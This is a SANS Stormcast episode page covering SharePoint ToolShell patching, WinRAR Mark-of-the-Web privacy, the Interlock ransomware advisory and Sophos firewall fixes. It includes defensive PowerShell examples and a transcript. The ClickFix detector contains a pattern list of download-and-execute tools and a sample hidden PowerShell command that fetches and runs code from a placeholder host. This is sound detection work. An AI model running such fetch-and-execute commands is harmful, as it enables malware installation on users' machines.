
SANS Stormcast Wednesday, July 23rd, 2025: Sharepoint 2016 Patch; MotW Privacy and WinZip; Interlock Ransomware; Sophos Patches

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9538.mp3


Microsoft Updates SharePoint Vulnerability Guidance: CVE-2025-53770 and CVE-2025-53771
Microsoft released its update for SharePoint 2016, completing the updates across all currently supported versions (Subscription Edition, 2019 and 2016). For 2019 and 2016 the fix is two downloads, the security update and the language pack, installed one after the other with a reboot in between; applying both at once fails. Patching alone is not enough for a server that was already hit: the early exploits stole the ASP.NET machine keys, and with those an attacker can forge ViewState and come back, so rotate the machine keys after patching and removing any web shells.
https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
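The post-patch steps described in the episode, as an added example that is not Microsoft's or the ISC's code: look for recently written server-side pages an attacker may have dropped, then rotate the ASP.NET machine keys of every web application. Assumptions: it runs in an elevated SharePoint Management Shell on a farm server; Update-SPMachineKey is the rotation cmdlet (its availability is checked before use, and Central Administration is the fallback); the LAYOUTS path is the default install location; the 14-day window is a placeholder.

```powershell
# Added example, not Microsoft's or the ISC's code. Assumptions: elevated
# SharePoint Management Shell; Update-SPMachineKey available (checked below);
# default LAYOUTS path; 14-day lookback is a placeholder.

Add-PSSnapin Microsoft.SharePoint.PowerShell -ErrorAction SilentlyContinue

# 1. Web shells dropped through this bug show up as server-side pages with a
#    recent write time. List anything recent under LAYOUTS for manual review.
function Find-RecentLayoutsFiles {
    param(
        [string]$LayoutsPath = 'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS',
        [datetime]$Since = (Get-Date).AddDays(-14)
    )
    Get-ChildItem -LiteralPath $LayoutsPath -Recurse -File -Include *.aspx, *.ashx, *.asmx -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $Since } |
        Select-Object FullName, LastWriteTime, Length
}

# 2. Rotate the ASP.NET machine keys for every web application, including
#    Central Administration. Stolen keys let an attacker sign their own
#    ViewState, so patching without rotation leaves the door open.
function Invoke-MachineKeyRotation {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if (-not (Get-Command Update-SPMachineKey -ErrorAction SilentlyContinue)) {
        throw 'Update-SPMachineKey is not available here; rotate the keys from Central Administration instead.'
    }
    foreach ($webApp in Get-SPWebApplication -IncludeCentralAdministration) {
        if ($PSCmdlet.ShouldProcess($webApp.Url, 'Rotate ASP.NET machine key')) {
            Update-SPMachineKey -WebApplication $webApp
            Write-Output "Rotated machine key: $($webApp.Url)"
        }
    }
}

Find-RecentLayoutsFiles | Format-Table -AutoSize
Invoke-MachineKeyRotation -Confirm:$false
iisreset   # worker processes pick up the new keys after the restart
```

Run the file listing first and triage it before rotating; once the keys change, any ViewState an attacker pre-computed stops validating, but a web shell that is still on disk does not care about ViewState at all.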

WinRAR MotW Privacy
Starting with version 7.10, WinRAR (the product the linked ISC diary covers; the episode title and audio say WinZip) has an option, on by default, to propagate only the zone identifier of the Mark of the Web (MotW) and to leave out the download URL. Recipients still see the files as coming from the Internet, but no longer learn which site they were downloaded from.
https://isc.sans.edu/diary/WinRAR%20MoTW%20Propagation%20Privacy/32130
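What the Mark of the Web actually carries, and the "zone only" behaviour the diary describes, as an added example that is not the ISC's or WinRAR's code. It reads the Zone.Identifier alternate data stream of a file, then rewrites it keeping just ZoneId, which is the check and the fix to apply before forwarding a downloaded file. Assumptions: NTFS volume on Windows; the sample stream is constructed to mirror what browsers typically write (ReferrerUrl and HostUrl fields); the file and URLs are placeholders.

```powershell
# Added example, not from the ISC diary or WinRAR. Assumptions: NTFS, Windows
# PowerShell 5.1 or PowerShell 7; the sample stream below is constructed.

# Parse the Zone.Identifier stream into an object (ZoneId, HostUrl, ReferrerUrl ...).
function Get-MotW {
    param([Parameter(Mandatory)][string]$Path)
    try {
        $raw = Get-Content -LiteralPath $Path -Stream Zone.Identifier -Raw -ErrorAction Stop
    } catch {
        return $null   # no stream: file does not carry a Mark of the Web
    }
    $motw = @{}
    foreach ($line in ($raw -split "`r?`n")) {
        if ($line -match '^\s*(\w+)\s*=\s*(.*)$') { $motw[$matches[1]] = $matches[2].Trim() }
    }
    [pscustomobject]$motw
}

# Rewrite the stream with only the zone marker. SmartScreen and Office still
# treat the file as Internet-sourced (ZoneId=3); the URLs are gone.
function Remove-MotWUrls {
    param([Parameter(Mandatory)][string]$Path)
    $m = Get-MotW -Path $Path
    if (-not $m -or -not $m.ZoneId) { return }
    Set-Content -LiteralPath $Path -Stream Zone.Identifier -Value "[ZoneTransfer]`r`nZoneId=$($m.ZoneId)"
}

# Constructed sample: emulate the stream a browser writes on download.
$sample = Join-Path $env:TEMP 'motw-demo.zip'
Set-Content -LiteralPath $sample -Value 'demo'
Set-Content -LiteralPath $sample -Stream Zone.Identifier -Value @"
[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://intranet.example.test/share/
HostUrl=https://intranet.example.test/files/report.zip
"@

Get-MotW -Path $sample       # ZoneId, ReferrerUrl and HostUrl are all visible
Remove-MotWUrls -Path $sample
Get-MotW -Path $sample       # only ZoneId=3 remains
```

The HostUrl is the field that leaks: an internal hostname, a SharePoint site, or a tokenised download link ends up readable by whoever receives the file, or the extracted files when an archiver propagates the mark.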

Interlock Ransomware
CISA, the FBI and other agencies published a joint advisory on the Interlock ransomware. Like their prior ransomware advisories, it is a comprehensive overview with many technical details useful for detecting and blocking this ransomware, including the initial access it relies on: fake browser updates installed by the user, and ClickFix lures that trick the user into pasting PowerShell commands under the pretense of a CAPTCHA check.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a
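A triage check for the ClickFix technique mentioned above, as an added example that is not from the CISA/FBI advisory. Assumption: the lure has the victim paste the command into the Win+R Run dialog, which records it under HKCU\...\Explorer\RunMRU as "<command>\1"; pastes into an already open terminal leave no RunMRU entry, so an empty result means "no evidence", not "clean". The pattern list and the sample entries are constructed for the example.

```powershell
# Added example, not from the CISA/FBI advisory. Assumption: ClickFix paste went
# through Win+R, so RunMRU holds it. Patterns and sample entries are constructed.

$ClickFixPatterns = @('powershell', 'pwsh', 'mshta', 'curl ', 'iwr ', 'irm ', 'iex',
                      'bitsadmin', 'certutil', '-enc', '-w hidden', 'http')

# Pure matcher: strips RunMRU's trailing "\1" and returns a hit object or nothing.
function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$Command)
    $cmd = $Command -replace '\\1$', ''
    $hit = $ClickFixPatterns | Where-Object { $cmd -match [regex]::Escape($_) } | Select-Object -First 1
    if ($hit) { [pscustomobject]@{ Command = $cmd; Matched = $hit } }
}

# Walk every loaded user hive (HKEY_USERS), not just the current user's HKCU.
function Find-ClickFixRunMru {
    foreach ($hive in Get-ChildItem Registry::HKEY_USERS | Where-Object { $_.PSChildName -notmatch '_Classes$' }) {
        $key = "Registry::HKEY_USERS\$($hive.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -match '^(MRUList|PS\w+)$') { continue }   # skip order list and PS* metadata
            $r = Test-ClickFixCommand -Command ([string]$p.Value)
            if ($r) { $r | Add-Member -NotePropertyName Sid -NotePropertyValue $hive.PSChildName -PassThru }
        }
    }
}

# Constructed sample entries in RunMRU's on-disk form, for an offline dry run.
$sample = @(
    'notepad\1',
    'powershell -w hidden -c "iwr https://example.invalid/x | iex"\1',
    '\\fileserver\share\1'
)
$sample | ForEach-Object { Test-ClickFixCommand -Command $_ } | Format-Table -AutoSize

Find-ClickFixRunMru | Format-Table -AutoSize
```

Pair this with PowerShell script block logging (event 4104) on the endpoint: the Run dialog shows what was pasted, the log shows what actually executed.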

Sophos Firewall Updates
Sophos patched five vulnerabilities in its firewalls. Two are rated critical: an unauthenticated arbitrary file write that may lead to code execution, which only affects devices running in high-availability mode (about 0.05% of devices per Sophos), and a SQL injection in the legacy transparent SMTP proxy (enabled by about 0.73% of users per Sophos). Update regardless, since either feature may be enabled later, and the remaining high-severity fixes are worth having too.
https://www.sophos.com/en-us/security-advisories/sophos-sa-20250721-sfos-rce

Podcast Transcript

Hello and welcome to the Wednesday, July 23rd, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu Bachelor's Degree Program in Applied Cybersecurity.

SharePoint is still at the top of everybody's mind and the ToolShell vulnerability is still being exploited. Microsoft has now also released an update for SharePoint 2016. Yesterday, we only had the update for 2019 and for the Subscription Edition. Another thing to point out here: there are actually two files that need to be downloaded and applied for 2019 and 2016. The first one is the security update for SharePoint itself. And then there is a second one, the language pack. When you install the security update for Microsoft SharePoint, you will have to reboot your system, and then you'll apply the language pack. The language pack update does not require another reboot, but you can't apply them at the same time. If you try it to save some time, well, they actually fail then. So, make sure you apply one after the other. There's another thing that I think has been a little bit overlooked in all of this. And that's step four here in Microsoft's response timeline that they published; that's part of this update. The early exploits that were used against SharePoint that took advantage of this vulnerability all had in common that they stole the system machine keys. And, well, that's actually a common thing to do if you're exploiting a .NET application, because if you do have the machine keys, you can then fake a ViewState. And, essentially, you can come back and exploit the system again. So, if you're just applying the patch and removing any backdoors or web shells or other files that you may find that an attacker may have created, this is not sufficient if the attacker stole the machine keys. You must update the machine keys. Otherwise, you're opening yourself up to a repeat compromise.

And Didier found an interesting little privacy issue that comes up if you're using WinZIP 7.10 or later. The issue here is, well, the good old mark of the web. I'm mentioning this at least like once a week or so here on the podcast. But, typically, on Windows, the mark of the web includes a zone ID of 3 indicating that the file was downloaded from the Internet. And then it also typically includes the URL it was downloaded from. Well, that, of course, is something that you may not necessarily want to tell people that you're sending files to. So, WinZIP now has the option, and that's the default setting, to only include the zone value. So, the recipient of a zip file, including files that were downloaded from the Internet, will still know that, hey, these files were downloaded from the Internet. But they will no longer be able to see what website the particular file was downloaded from. You can uncheck this particular value, and then it will behave just like it used to in older versions.

And the FBI, with other government agencies, has published a nice write-up about the Interlock ransomware. CISA and FBI have done this a number of times in the past for various ransomware groups. This is not usually because this particular malware is brand new, but because it is sort of one of the dominating ransomware samples that they're seeing these days. It has very nice, hands-on information about how to detect and how to prevent this particular ransomware. Apparently, this ransomware often arrives as, essentially, a fake browser update, and that is then being installed by the user. So, not so much hoping for technical exploits here. They're also using the famous ClickFix technique, where, essentially, the user is tricked into copy-pasting some PowerShell code into their system, well, with sort of the pretense of having to bypass a CAPTCHA in order to move on to the next page.

And Sophos released an update for its firewalls, fixing a total of five different vulnerabilities, two of which are rated critical by Sophos. One of the critical vulnerabilities is an arbitrary file write vulnerability that may lead to arbitrary code execution without authentication. The next critical one is a SQL injection vulnerability in their transparent SMTP proxy, which they call a legacy feature. Both of these vulnerabilities only apply to very specific features. For example, the arbitrary file upload vulnerability only applies to devices in high-availability mode. And, well, Sophos thinks that's only 0.05% of devices. Same for the SQL injection vulnerability. This SMTP proxy is a legacy feature, and Sophos thinks only 0.73% of users have this feature enabled. So, get it updated. You never know if you're going to enable one of those features by mistake or maybe intentionally, and get it out of the way. Also, some of these high vulnerabilities and such are probably things that you should better update. Well, and that's it for today. So, thanks again for listening, and talk to you again tomorrow. Bye.